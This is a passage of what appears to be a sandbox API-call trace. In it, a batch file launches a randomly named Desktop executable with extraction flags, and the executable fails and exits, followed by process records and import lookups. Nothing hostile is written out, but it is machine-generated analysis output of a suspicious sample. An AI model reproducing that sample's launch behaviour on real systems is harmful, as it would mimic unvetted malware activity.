_MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0238.388] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0238.389] GetProcessHeap () returned 0x5f0000 [0238.389] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x606358, Size=0x9e) returned 0x606358 [0238.389] GetProcessHeap () returned 0x5f0000 [0238.389] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x606358) returned 0x9e [0238.389] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x6063a9, cbMultiByte=73, lpWideCharStr=0x606360, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0238.390] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16ed6c | out: _Buffer="\r\n") returned 2 [0238.390] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.390] GetFileType (hFile=0x7) returned 0x2 [0238.392] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0238.392] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ed2c | out: lpMode=0x16ed2c) returned 1 [0238.392] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.392] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16ed58, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16ed58*=0x2) returned 1 [0238.394] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0238.394] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x16ed68 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0238.394] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x16ed68 | out: _Buffer=">") returned 1 [0238.394] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.394] GetFileType (hFile=0x7) returned 0x2 [0238.395] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0238.395] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ed30 | out: lpMode=0x16ed30) returned 1 [0238.395] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.395] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x16ed5c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x16ed5c*=0x26) returned 1 [0238.395] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.395] GetFileType (hFile=0x7) returned 0x2 [0238.396] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0238.396] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16efb4 | out: lpMode=0x16efb4) returned 1 [0238.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.396] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x16efe0, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x16efe0*=0x1) returned 1 [0238.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.396] GetFileType (hFile=0x7) returned 0x2 [0238.397] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0238.397] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ef98 | out: lpMode=0x16ef98) returned 1 [0238.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.397] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x614ab0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x16efc4, lpReserved=0x0 | out: lpBuffer=0x614ab0*, lpNumberOfCharsWritten=0x16efc4*=0xc) returned 1 [0238.397] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16efd0 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0238.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.397] GetFileType (hFile=0x7) returned 0x2 [0238.398] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0238.398] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ef90 | out: lpMode=0x16ef90) returned 1 [0238.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.398] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x16efbc, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16efbc*=0x2c) returned 1 [0238.400] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16efec | out: _Buffer=") ") returned 2 [0238.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.400] GetFileType (hFile=0x7) returned 0x2 [0238.400] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0238.400] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16efac | out: lpMode=0x16efac) returned 1 [0238.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.400] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16efd8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16efd8*=0x2) returned 1 [0238.401] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f00c | out: _Buffer="\r\n") returned 2 [0238.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.401] GetFileType (hFile=0x7) returned 0x2 [0238.401] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0238.401] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16efcc | out: lpMode=0x16efcc) returned 1 [0238.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.401] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16eff8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16eff8*=0x2) returned 1 [0238.403] GetConsoleTitleW (in: lpConsoleTitle=0x16eb1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0238.404] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6066a8, lpFilePart=0x16e63c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16e63c*="Desktop") returned 0x25 [0238.404] SetErrorMode (uMode=0x0) returned 0x1 [0238.404] GetProcessHeap () returned 0x5f0000 [0238.404] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6066a0, Size=0x6e) returned 0x6066a0 [0238.404] GetProcessHeap () returned 0x5f0000 [0238.404] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6066a0) returned 0x6e [0238.404] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0238.404] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0238.404] GetProcessHeap () returned 0x5f0000 [0238.404] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x120) returned 0x606718 [0238.404] GetProcessHeap () returned 0x5f0000 [0238.404] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x238) returned 0x606840 [0238.405] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0238.405] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x16e3d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e3d8) returned 0x6069f0 [0238.405] FindClose (in: hFindFile=0x6069f0 | out: hFindFile=0x6069f0) returned 1 [0238.405] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0238.405] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0238.405] GetConsoleTitleW (in: lpConsoleTitle=0x16e8b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0238.405] InitializeProcThreadAttributeList (in: lpAttributeList=0x16e738, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16e800 | out: lpAttributeList=0x16e738, lpSize=0x16e800) returned 1 [0238.406] UpdateProcThreadAttribute (in: lpAttributeList=0x16e738, dwFlags=0x0, Attribute=0x60001, lpValue=0x16e7f8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16e738, lpPreviousValue=0x0) returned 1 [0238.406] GetStartupInfoW (in: lpStartupInfo=0x16e6f4 | out: lpStartupInfo=0x16e6f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0238.406] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0238.406] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x16e794*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16e7e0 | out: lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x16e7e0*(hProcess=0x74, hThread=0x84, dwProcessId=0x6f4, dwThreadId=0x90c)) returned 1 [0238.431] CloseHandle (hObject=0x84) returned 1 [0238.431] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0238.431] GetProcessHeap () returned 0x5f0000 [0238.431] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x609650 | out: hHeap=0x5f0000) returned 1 [0238.431] GetEnvironmentStringsW () returned 0x608ac0* [0238.432] GetProcessHeap () returned 0x5f0000 [0238.432] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb84) returned 0x609650 [0238.432] FreeEnvironmentStringsW (penv=0x608ac0) returned 1 [0238.432] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0240.325] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x16e6d4 | out: lpExitCode=0x16e6d4*=0x1) returned 1 [0240.325] CloseHandle (hObject=0x74) returned 1 [0240.325] _vsnwprintf (in: _Buffer=0x16e81c, _BufferCount=0x13, _Format="%08X", _ArgList=0x16e6e0 | out: _Buffer="00000001") returned 8 [0240.325] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0240.325] GetProcessHeap () returned 0x5f0000 [0240.325] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x609650 | out: hHeap=0x5f0000) returned 1 [0240.325] GetEnvironmentStringsW () returned 0x608ac0* [0240.326] GetProcessHeap () returned 0x5f0000 [0240.326] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb84) returned 0x609650 [0240.326] FreeEnvironmentStringsW (penv=0x608ac0) returned 1 [0240.326] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0240.326] GetProcessHeap () returned 0x5f0000 [0240.326] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x609650 | out: hHeap=0x5f0000) returned 1 [0240.326] GetEnvironmentStringsW () returned 0x608ac0* [0240.326] GetProcessHeap () returned 0x5f0000 [0240.326] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb84) returned 0x609650 [0240.326] FreeEnvironmentStringsW (penv=0x608ac0) returned 1 [0240.326] GetProcessHeap () returned 0x5f0000 [0240.326] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f0dd0 | out: hHeap=0x5f0000) returned 1 [0240.326] DeleteProcThreadAttributeList (in: lpAttributeList=0x16e738 | out: lpAttributeList=0x16e738) [0240.327] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.327] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0240.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0240.328] _get_osfhandle (_FileHandle=0) returned 0x3 [0240.328] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0240.329] SetConsoleInputExeNameW () returned 0x1 [0240.329] GetConsoleOutputCP () returned 0x1b5 [0240.329] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0240.329] SetThreadUILanguage (LangId=0x0) returned 0x409 [0240.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f104, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0240.330] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0240.330] _get_osfhandle (_FileHandle=3) returned 0x74 [0240.330] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0240.330] GetProcessHeap () returned 0x5f0000 [0240.331] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606970 | out: hHeap=0x5f0000) returned 1 [0240.331] GetProcessHeap () returned 0x5f0000 [0240.331] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606840 | out: hHeap=0x5f0000) returned 1 [0240.331] GetProcessHeap () returned 0x5f0000 [0240.331] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606718 | out: hHeap=0x5f0000) returned 1 [0240.331] GetProcessHeap () returned 0x5f0000 [0240.331] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6066a0 | out: hHeap=0x5f0000) returned 1 [0240.331] GetProcessHeap () returned 0x5f0000 [0240.331] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606618 | out: hHeap=0x5f0000) returned 1 [0240.331] GetProcessHeap () returned 0x5f0000 [0240.331] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606400 | out: hHeap=0x5f0000) returned 1 [0240.331] GetProcessHeap () returned 0x5f0000 [0240.331] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x614af0 | out: hHeap=0x5f0000) returned 1 [0240.331] GetProcessHeap () returned 0x5f0000 [0240.331] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x614aa8 | out: hHeap=0x5f0000) returned 1 [0240.331] GetProcessHeap () returned 0x5f0000 [0240.331] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f0de8 | out: hHeap=0x5f0000) returned 1 [0240.332] GetProcessHeap () returned 0x5f0000 [0240.332] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606338 | out: hHeap=0x5f0000) returned 1 [0240.332] GetProcessHeap () returned 0x5f0000 [0240.332] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f0e00 | out: hHeap=0x5f0000) returned 1 [0240.332] GetProcessHeap () returned 0x5f0000 [0240.332] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6055e0 | out: hHeap=0x5f0000) returned 1 [0240.332] GetProcessHeap () returned 0x5f0000 [0240.332] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6062d8 | out: hHeap=0x5f0000) returned 1 [0240.332] GetProcessHeap () returned 0x5f0000 [0240.332] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5ff4d8 | out: hHeap=0x5f0000) returned 1 [0240.332] GetProcessHeap () returned 0x5f0000 [0240.332] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606278 | out: hHeap=0x5f0000) returned 1 [0240.332] GetProcessHeap () returned 0x5f0000 [0240.332] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606218 | out: hHeap=0x5f0000) returned 1 [0240.332] GetProcessHeap () returned 0x5f0000 [0240.332] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606198 | out: hHeap=0x5f0000) returned 1 [0240.332] GetProcessHeap () returned 0x5f0000 [0240.332] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606140 | out: hHeap=0x5f0000) returned 1 [0240.332] GetProcessHeap () returned 0x5f0000 [0240.332] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f12a0 | out: hHeap=0x5f0000) returned 1 [0240.333] GetProcessHeap () returned 0x5f0000 [0240.333] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6060f0 | out: hHeap=0x5f0000) returned 1 [0240.333] GetProcessHeap () returned 0x5f0000 [0240.333] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f1240 | out: hHeap=0x5f0000) returned 1 [0240.333] _get_osfhandle (_FileHandle=3) returned 0x74 [0240.333] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0240.333] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f0e8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x16f0e8*=0x0, lpOverlapped=0x0) returned 1 [0240.333] GetLastError () returned 0x0 [0240.333] _get_osfhandle (_FileHandle=3) returned 0x74 [0240.333] GetFileType (hFile=0x74) returned 0x1 [0240.333] _get_osfhandle (_FileHandle=3) returned 0x74 [0240.333] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0240.334] GetProcessHeap () returned 0x5f0000 [0240.334] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400a) returned 0x614aa8 [0240.334] GetProcessHeap () returned 0x5f0000 [0240.334] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x614aa8 | out: hHeap=0x5f0000) returned 1 [0240.335] _get_osfhandle (_FileHandle=3) returned 0x74 [0240.335] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0240.335] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f0cc, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x16f0cc*=0x0, lpOverlapped=0x0) returned 1 [0240.335] GetLastError () returned 0x0 [0240.335] _get_osfhandle (_FileHandle=3) returned 0x74 [0240.335] GetFileType (hFile=0x74) returned 0x1 [0240.335] _get_osfhandle (_FileHandle=3) returned 0x74 [0240.335] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0240.335] GetProcessHeap () returned 0x5f0000 [0240.335] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400a) returned 0x614aa8 [0240.335] GetProcessHeap () returned 0x5f0000 [0240.335] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x614aa8 | out: hHeap=0x5f0000) returned 1 [0240.336] longjmp () [0240.336] _tell (_FileHandle=3) returned 226 [0240.336] _close (_FileHandle=3) returned 0 [0240.336] CmdBatNotification () returned 0x1 [0240.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.336] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0240.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.337] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0240.339] _get_osfhandle (_FileHandle=0) returned 0x3 [0240.339] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0240.340] SetConsoleInputExeNameW () returned 0x1 [0240.340] GetConsoleOutputCP () returned 0x1b5 [0240.340] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0240.340] SetThreadUILanguage (LangId=0x0) returned 0x409 [0240.340] exit (_Code=1) Process: id = "211" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1dd32000" os_pid = "0x150" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 778 os_tid = 0x6dc Thread: id = 780 os_tid = 0x644 Thread: id = 792 os_tid = 0x6dc Process: id = "212" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x2abe3000" os_pid = "0x570" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "156" os_parent_pid = "0x710" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 781 os_tid = 0xb20 [0212.441] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0212.441] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0212.441] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0212.441] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0212.441] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0212.441] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0212.442] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0212.442] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0212.442] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0212.442] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0212.442] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0212.442] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0212.442] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0212.442] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0212.442] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0212.443] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0212.443] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0212.443] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0212.443] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0212.443] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0212.443] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0212.443] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0212.443] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0212.443] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0212.443] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0212.444] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0212.444] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0212.444] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0212.444] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0212.444] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0212.444] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0212.444] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0212.444] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0212.444] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0212.445] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0212.445] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0212.445] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0212.445] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0212.445] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0212.445] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0212.445] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0212.445] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0212.445] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0212.445] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0212.446] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0212.446] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0212.446] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0212.446] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0212.446] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0212.446] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0212.446] GetProcAddress 